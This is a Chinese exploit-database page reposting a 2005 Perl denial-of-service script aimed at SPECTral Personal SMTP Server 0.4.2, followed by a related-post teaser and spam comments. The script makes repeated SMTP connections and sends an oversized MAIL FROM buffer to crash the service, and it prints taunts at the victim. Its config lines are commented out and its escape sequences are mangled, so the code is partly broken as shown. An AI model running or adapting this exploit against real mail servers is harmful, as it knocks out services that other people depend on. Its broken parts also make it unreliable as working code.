SPECTral Personal SMTP Server 0.4.2 – Denial of Service
漏洞ID | 1054982 | 漏洞类型 | |
发布时间 | 2005-03-28 | 更新时间 | 2005-03-28 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
use IO::Socket;
###### Small config ################################
# #
# If service not DoSeD try to increase this value. #
# #
# Number of trys for DoS. #
# #
# $trys = 10; #
# #
# Quantity signs for atack. #
# #
# $buf = 200000; #
# #
####################################################
if (@ARGV < 1)
{
print "n /n";
print " DoS - SPECTral Personal SMTP Server <= 0.4.2 b 338 n";
print " Usage: Dos_sp_0.3.pl <ip> [port] n";
print " Coded by GreenwooD Network Security Team nn";
print " ============< nst.void.ru >=========== n";
print " /n";
exit();
}
$ip = $ARGV[0];
$port = 25;
if ($ARGV[1])
{
$port=$ARGV[1];
}
$j=1;
print "n [+] - Prepare to DoS on $ip:$portn";
do
{
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $ip,
PeerPort => $port) or die "n [-] - Can't connect to $ip:$port or already DoSeDn";
$i=1;
$remote->send("HELO Victem. You going down today. You SMTP service vulnearable, update it. It is exploit usage.rn");
sleep $i;
$remote->send("MAIL FROM:<" . "A" x $buf . ">rn");
sleep $i;
$remote->send("RCPT TO:<[email protected]>rn");
sleep $i;
$remote->send("DATArn");
sleep $i;
$remote->send(" This of shit letter! " . rand(10) . "rn");
sleep $i;
$remote->send(".rn");
close($remote);
print " [t] - Number of try = $jn";
$j=$j+1;
} until ($j > $trys);
print " [+] - O yes! Service going down...n";
# milw0rm.com [2005-03-28]
相关推荐: Go Smart Inc GoSmart Message Board – Multiple Input Validation Vulnerabilities
Go Smart Inc GoSmart Message Board – Multiple Input Validation Vulnerabilities 漏洞ID 1054712 漏洞类型 发布时间 2004-10-11 更新时间 2004-10-11 C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666